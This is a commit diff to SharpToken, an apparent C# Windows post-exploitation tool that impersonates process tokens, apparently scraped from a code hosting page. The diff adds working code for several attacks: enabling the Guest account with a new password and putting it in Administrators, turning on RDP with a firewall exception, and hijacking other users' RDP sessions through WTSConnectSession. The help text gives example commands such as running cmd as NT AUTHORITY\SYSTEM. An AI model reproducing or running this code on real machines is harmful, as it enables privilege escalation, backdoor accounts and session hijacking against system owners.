33using System . Collections . Generic ;
44using System . Diagnostics ;
55using System . DirectoryServices ;
6+ using System . DirectoryServices . ActiveDirectory ;
67using System . IO ;
8+ using System . Management ;
79using System . Reflection ;
810using System . Runtime . ConstrainedExecution ;
911using System . Runtime . InteropServices ;
1012using System . Security . Permissions ;
1113using System . Security . Principal ;
1214using System . Text ;
1315using System . Threading ;
16+ using static System . Management . ManagementObjectCollection ;
1417
1518namespace SharpToken
1619{
@@ -450,6 +453,12 @@ public static extern bool PeekNamedPipe(IntPtr handle,
450453 [ DllImport ( "Kernel32" , SetLastError = true ) ]
451454 public static extern bool SetHandleInformation ( IntPtr TokenHandle , uint dwMask , uint dwFlags ) ;
452455
456+ [ DllImport ( "wtsapi32.dll" , CharSet = CharSet . Auto , SetLastError = true ) ]
457+ public static extern int WTSConnectSession ( int targetSessionId , int sourceSessionId , string password , bool wait ) ;
458+
459+ [ DllImport ( "kernel32.dll" ) ]
460+ public static extern int WTSGetActiveConsoleSessionId ( ) ;
461+
453462 [ DllImport ( "kernel32.dll" , SetLastError = true ) ]
454463 public static extern IntPtr OpenProcess (
455464 ProcessAccessFlags processAccess , bool bInheritHandle , int processId ) ;
@@ -1393,6 +1402,8 @@ public static void createProcessInteractive(TextWriter consoleWriter,string user
13931402 Console . Write ( Encoding . Default . GetChars ( readBytes , 0 , read ) ) ;
13941403 }
13951404
1405+ Thread . Sleep ( 100 ) ;
1406+
13961407 }
13971408
13981409
@@ -1577,8 +1588,7 @@ public static void createProcessReadOut(TextWriter consoleWriter, string userNam
15771588 }
15781589 }
15791590
1580- public static void addUser ( TextWriter consoleWriter , string domain , string userName , string passWord , string group )
1581- {
1591+ public static void addUser ( TextWriter consoleWriter , string domain , string userName , string passWord , string group ) {
15821592 bool isOK = false ;
15831593 TokenuUils . ListProcessTokens ( 0 , processToken =>
15841594 {
@@ -1635,9 +1645,79 @@ public static void addUser(TextWriter consoleWriter,string domain, string userNa
16351645 consoleWriter . WriteLine ( "add user Fail!" ) ;
16361646 }
16371647 }
1648+ public static void enableUser ( TextWriter consoleWriter , string domain , string userName , string passWord , string group )
1649+ {
1650+ bool isOK = false ;
1651+ TokenuUils . ListProcessTokens ( 0 , processToken =>
1652+ {
1653+ if ( processToken . UserName != "NT AUTHORITY\\ ANONYMOUS LOGON" && processToken . ImpersonateLoggedOnUser ( ) )
1654+ {
1655+ try
1656+ {
1657+ using ( DirectoryEntry dir = new DirectoryEntry ( domain ) )
1658+ {
1659+ using ( DirectoryEntry user = dir . Children . Find ( userName , "User" ) ) //查找用户名
1660+ {
1661+ user . Invoke ( "SetPassword" , passWord ) ; //用户密码
1662+ user . InvokeSet ( "UserFlags" , 66049 ) ; //密码永不过期
1663+ user . InvokeSet ( "AccountDisabled" , false ) ; //启用账户
1664+ user . CommitChanges ( ) ; //保存用户
1665+
1666+ if ( group != null && group . Length > 0 )
1667+ {
1668+ using ( DirectoryEntry grp = dir . Children . Find ( group , "group" ) )
1669+ {
1670+ bool isExist = false ;
1671+ object members = grp . Invoke ( "Members" , null ) ;
1672+ foreach ( object member in ( IEnumerable ) members )
1673+ {
1674+ DirectoryEntry x = new DirectoryEntry ( member ) ;
1675+ if ( x . Name == userName )
1676+ {
1677+ isExist = true ;
1678+ break ;
1679+ }
1680+ }
1681+ if ( grp . Name != "" && ! isExist )
1682+ {
1683+ grp . Invoke ( "Add" , user . Path . ToString ( ) ) ; //将用户添加到某组
1684+ }
1685+ grp . CommitChanges ( ) ;
1686+ }
1687+ }
1688+ }
1689+ }
1690+ }
1691+ catch ( Exception e )
1692+ {
1693+ NativeMethod . RevertToSelf ( ) ;
1694+ processToken . Close ( ) ;
1695+ return true ;
1696+ }
1697+ }
1698+ else
1699+ {
1700+ processToken . Close ( ) ;
1701+ return true ;
1702+ }
1703+ isOK = true ;
1704+ NativeMethod . RevertToSelf ( ) ;
1705+ processToken . Close ( ) ;
1706+ return false ;
1707+ } ) ;
1708+
1709+ if ( isOK )
1710+ {
1711+ consoleWriter . WriteLine ( "enable user Successful!" ) ;
1712+ }
1713+ else
1714+ {
1715+ consoleWriter . WriteLine ( "enable user Fail!" ) ;
1716+ }
1717+ }
16381718 public static void deleteUser ( TextWriter consoleWriter , string domain , string userName )
16391719 {
1640- bool isOK = false ;
1720+ bool isOK = false ;
16411721 TokenuUils . ListProcessTokens ( 0 , processToken =>
16421722 {
16431723 if ( processToken . UserName != "NT AUTHORITY\\ ANONYMOUS LOGON" && processToken . ImpersonateLoggedOnUser ( ) )
@@ -1679,8 +1759,137 @@ public static void deleteUser(TextWriter consoleWriter, string domain,string use
16791759 consoleWriter . WriteLine ( "delete user Fail!" ) ;
16801760 }
16811761 }
1762+ public static void enableRDP ( TextWriter consoleWriter ) {
1763+
1764+ bool isOK = false ;
1765+ int rdpPort = 3389 ;
1766+ TokenuUils . ListProcessTokens ( 0 , processToken =>
1767+ {
1768+ if ( processToken . UserName != "NT AUTHORITY\\ ANONYMOUS LOGON" && processToken . ImpersonateLoggedOnUser ( ) )
1769+ {
1770+ try
1771+ {
1772+ ManagementObject win32TerminalServiceSetting = null ;
1773+ string root = "root\\ cimv2\\ terminalservices" ;
1774+ if ( Environment . OSVersion . Version . Major < 6 )
1775+ {
1776+ root = "root\\ cimv2" ;
1777+ }
1778+ ManagementClass mc = new ManagementClass ( root , "Win32_TerminalServiceSetting" , null ) ;
1779+ mc . Scope . Options . EnablePrivileges = true ;
1780+ ManagementObjectEnumerator managementObjectEnumerator = mc . GetInstances ( ) . GetEnumerator ( ) ;
1781+ managementObjectEnumerator . MoveNext ( ) ;
1782+ win32TerminalServiceSetting = ( ManagementObject ) managementObjectEnumerator . Current ;
1783+
1784+ System . Management . ManagementBaseObject inParams = null ;
1785+ inParams = win32TerminalServiceSetting . GetMethodParameters ( "SetAllowTSConnections" ) ;
1786+ inParams [ "AllowTSConnections" ] = ( ( System . UInt32 ) ( 1 ) ) ;
1787+ inParams [ "ModifyFirewallException" ] = ( ( System . UInt32 ) ( 1 ) ) ;
1788+ System . Management . ManagementBaseObject outParams = win32TerminalServiceSetting . InvokeMethod ( "SetAllowTSConnections" , inParams , null ) ;
1789+ uint returnValue = System . Convert . ToUInt32 ( outParams . Properties [ "ReturnValue" ] . Value ) ;
1790+ if ( returnValue == 0 )
1791+ {
1792+ try
1793+ {
1794+ using ( Microsoft . Win32 . RegistryKey key = Microsoft . Win32 . Registry . LocalMachine . OpenSubKey ( @"System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" , false ) )
1795+ {
1796+ if ( key != null )
1797+ {
1798+ rdpPort = ( int ) key . GetValue ( "PortNumber" , 3389 ) ;
1799+ }
1800+ }
1801+ }
1802+ catch ( Exception e )
1803+ {
1804+ consoleWriter . WriteLine ( e . ToString ( ) ) ;
1805+ }
1806+ }
1807+ else
1808+ {
1809+ throw new Exception ( "enableRDP return: " + returnValue ) ;
1810+ }
1811+ }
1812+ catch ( Exception e )
1813+ {
1814+ NativeMethod . RevertToSelf ( ) ;
1815+ processToken . Close ( ) ;
1816+ return true ;
1817+ }
1818+ }
1819+ else
1820+ {
1821+ processToken . Close ( ) ;
1822+ return true ;
1823+ }
1824+ isOK = true ;
1825+ NativeMethod . RevertToSelf ( ) ;
1826+ processToken . Close ( ) ;
1827+ return false ;
1828+ } ) ;
1829+
1830+ if ( isOK )
1831+ {
1832+ consoleWriter . WriteLine ( $ "enableRDP Successful RDPPort:{ rdpPort } !") ;
1833+ }
1834+ else
1835+ {
1836+ consoleWriter . WriteLine ( "enableRDP Fail!" ) ;
1837+ }
1838+ }
1839+ public static void tscon ( TextWriter consoleWriter , int targetSessionId , int sourceSessionId ) {
1840+ if ( sourceSessionId == - 1 )
1841+ {
1842+ sourceSessionId = NativeMethod . WTSGetActiveConsoleSessionId ( ) ;
1843+ }
1844+ if ( sourceSessionId < 0 )
1845+ {
1846+ consoleWriter . WriteLine ( "Please enter sourceSessionId\n SharpToken tscon 2 1" ) ;
1847+ }
1848+ else
1849+ {
1850+ bool isOK = false ;
1851+ TokenuUils . ListProcessTokens ( 0 , processToken =>
1852+ {
1853+ if ( processToken . UserName != "NT AUTHORITY\\ ANONYMOUS LOGON" && processToken . ImpersonateLoggedOnUser ( ) )
1854+ {
1855+ try
1856+ {
1857+ if ( NativeMethod . WTSConnectSession ( targetSessionId , sourceSessionId , "" , true ) == 0 )
1858+ {
1859+ throw new Exception ( "" + Marshal . GetLastWin32Error ( ) ) ;
1860+ }
1861+ }
1862+ catch ( Exception e )
1863+ {
1864+ NativeMethod . RevertToSelf ( ) ;
1865+ processToken . Close ( ) ;
1866+ return true ;
1867+ }
1868+ }
1869+ else
1870+ {
1871+ processToken . Close ( ) ;
1872+ return true ;
1873+ }
1874+ isOK = true ;
1875+ NativeMethod . RevertToSelf ( ) ;
1876+ processToken . Close ( ) ;
1877+ return false ;
1878+ } ) ;
1879+
1880+ if ( isOK )
1881+ {
1882+ consoleWriter . WriteLine ( "Success!" ) ;
1883+ }
1884+ else
1885+ {
1886+ consoleWriter . WriteLine ( $ "Failed to connect to session: { targetSessionId } error: { Marshal . GetLastWin32Error ( ) } ") ;
1887+ }
1888+ }
1889+
16821890
16831891
1892+ }
16841893 public static void help ( TextWriter consoleWriter )
16851894 {
16861895 consoleWriter . WriteLine ( @"
@@ -1700,20 +1909,28 @@ list_token [process pid]
17001909
17011910 list_all_token [process pid]
17021911
1703- add_user <tokenUser> <username> <password> [group] [domain]
1912+ add_user <username> <password> [group] [domain]
1913+
1914+ enableUser <username> <NewPassword> [NewGroup]
17041915
1705- delete_user <tokenUser> < username> [domain]
1916+ delete_user <username> [domain]
17061917
1707- execute <tokenUser> <commandLine> [Interactive]
1918+ execute <tokenUser> <commandLine> [Interactive]
1919+
1920+ enableRDP
1921+
1922+ tscon <targetSessionId> [sourceSessionId]
17081923
17091924
17101925example:
17111926 SharpToken list_token
17121927 SharpToken list_token 6543
1713- SharpToken add_user ""NT AUTHORITY\SYSTEM"" admin 123456 Administrators
1714- SharpToken delete_user ""NT AUTHORITY\SYSTEM"" admin
1928+ SharpToken add_user admin Abcd1234! Administrators
1929+ SharpToken enableUser Guest Abcd1234! Administrators
1930+ SharpToken delete_user admin
17151931 SharpToken execute ""NT AUTHORITY\SYSTEM"" ""cmd /c whoami""
17161932 SharpToken execute ""NT AUTHORITY\SYSTEM"" cmd true
1933+ SharpToken tscon 1
17171934" ) ;
17181935 }
17191936
@@ -1758,38 +1975,70 @@ static void Main(string[] args)
17581975 listAllToken ( Console . Out , processPid ) ;
17591976 break ;
17601977 case "add_user" :
1761- if ( args . Length < 4 )
1978+ if ( args . Length < 3 )
17621979 {
17631980 goto help ;
17641981 }
17651982 else
17661983 {
1767- string tokenUser = args [ 1 ] ;
1768- string userName = args [ 2 ] ;
1769- string password = args [ 3 ] ;
1770- if ( args . Length > 4 )
1984+ string userName = args [ 1 ] ;
1985+ string password = args [ 2 ] ;
1986+ if ( args . Length > 3 )
17711987 {
1772- group = args [ 4 ] ;
1773- if ( args . Length > 5 )
1988+ group = args [ 3 ] ;
1989+ if ( args . Length > 4 )
17741990 {
1775- domain = args [ 5 ] ;
1991+ domain = args [ 4 ] ;
17761992 }
17771993 }
17781994 addUser ( Console . Out , domain , userName , password , group ) ;
17791995 break ;
17801996 }
1781- case "delete_user " :
1997+ case "enableUser " :
17821998 if ( args . Length < 3 )
17831999 {
17842000 goto help ;
17852001 }
17862002 else
17872003 {
1788- string tokenUser = args [ 1 ] ;
1789- string userName = args [ 2 ] ;
2004+ string userName = args [ 1 ] ;
2005+ string password = args [ 2 ] ;
17902006 if ( args . Length > 3 )
17912007 {
1792- domain = args [ 4 ] ;
2008+ group = args [ 3 ] ;
2009+ if ( args . Length > 4 )
2010+ {
2011+ domain = args [ 4 ] ;
2012+ }
2013+ }
2014+ enableUser ( Console . Out , domain , userName , password , group ) ;
2015+ break ;
2016+ }
2017+ case "enableRDP" :
2018+ enableRDP ( Console . Out ) ;
2019+ break ;
2020+ case "tscon" :
2021+ if ( args . Length > 1 )
2022+ {
2023+ int targetSessionId = int . Parse ( args [ 1 ] ) ; int sourceSessionId = int . Parse ( args . Length > 2 ? args [ 2 ] : "-1" ) ;
2024+ tscon ( Console . Out , targetSessionId , sourceSessionId ) ;
2025+ }
2026+ else
2027+ {
2028+ goto help ;
2029+ }
2030+ break ;
2031+ case "delete_user" :
2032+ if ( args . Length < 2 )
2033+ {
2034+ goto help ;
2035+ }
2036+ else
2037+ {
2038+ string userName = args [ 1 ] ;
2039+ if ( args . Length > 2 )
2040+ {
2041+ domain = args [ 2 ] ;
17932042 }
17942043 deleteUser ( Console . Out , domain , userName ) ;
17952044 break ;
0 commit comments